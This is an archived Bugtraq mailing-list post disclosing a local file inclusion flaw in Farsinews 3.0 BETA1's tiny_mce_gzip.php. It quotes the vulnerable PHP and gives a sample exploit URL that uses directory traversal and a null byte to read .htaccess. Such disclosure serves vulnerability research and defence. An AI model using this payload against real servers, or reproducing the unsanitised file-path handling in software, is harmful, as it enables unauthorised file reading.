[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Local file inclusion in Farsinews3.0BETA1

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Local file inclusion in Farsinews3.0BETA1
From: armin390@xxxxxxxxx
Date: 10 Jul 2006 15:33:33 -0000

if magic_quotes_gpc is Off in php.ini then local file inclusion in 
/jscripts/tiny_mce/tiny_mce_gzip.php is available to use;)!!
why?
#code(jscripts/tiny_mce/tiny_mce_gzip.php)
...
        $theme = isset($_REQUEST['theme']) ? $_REQUEST['theme'] : "";
        $language = isset($_REQUEST['language']) ? $_REQUEST['language'] : "";
        $plugins = isset($_REQUEST['plugins']) ? $_REQUEST['plugins'] : "";
...
        if ($theme) {
                // Write main script and patch some things
                echo file_get_contents(realpath("tiny_mce" . $suffix . ".js"));
                echo 'TinyMCE.prototype.loadScript = function() {};';
                echo "tinyMCE.init(TinyMCECompressed_settings);";

                // Load theme, language pack and theme language packs
                echo file_get_contents(realpath("themes/" . $theme . 
"/editor_template" . $suffix . ".js"));
                echo file_get_contents(realpath("themes/" . $theme . "/langs/" 
. $language . ".js"));
                echo file_get_contents(realpath("langs/" . $language . ".js"));

#exploit
for example!:
http://target/jscripts/tiny_mce/tiny_mce_gzip.php?language=../../../../.htaccess%00&theme=advanced
...

Prev by Date: Re: Mico crashes when contected with wrong IOR / DoS
Next by Date: [ANNOUNCEMENT] Samba 3.0.1 - 3.0.22: memory exhaustion DoS against smbd
Previous by thread: [SECURITY] [DSA 1107-1] New GnuPG packages fix denial of service
Next by thread: [ANNOUNCEMENT] Samba 3.0.1 - 3.0.22: memory exhaustion DoS against smbd
Index(es):
- Date
- Thread